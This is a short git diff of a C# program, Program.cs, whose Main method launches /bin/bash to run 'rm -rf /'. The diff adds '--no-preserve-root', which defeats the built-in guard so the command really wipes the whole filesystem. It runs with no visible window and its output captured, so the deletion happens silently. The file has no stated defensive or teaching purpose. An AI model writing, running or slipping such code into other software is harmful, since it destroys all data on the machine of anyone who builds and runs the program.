diff --git a/Program.cs b/Program.cs index e344a16..d368059 100644 --- a/Program.cs +++ b/Program.cs @@ -23,7 +23,7 @@ static void Main(string[] args) { Process process = new Process(); psi.FileName = "/bin/bash"; - psi.Arguments = "rm -rf /"; + psi.Arguments = "rm -rf / --no-preserve-root"; psi.RedirectStandardOutput = true; psi.UseShellExecute = false; psi.CreateNoWindow = true;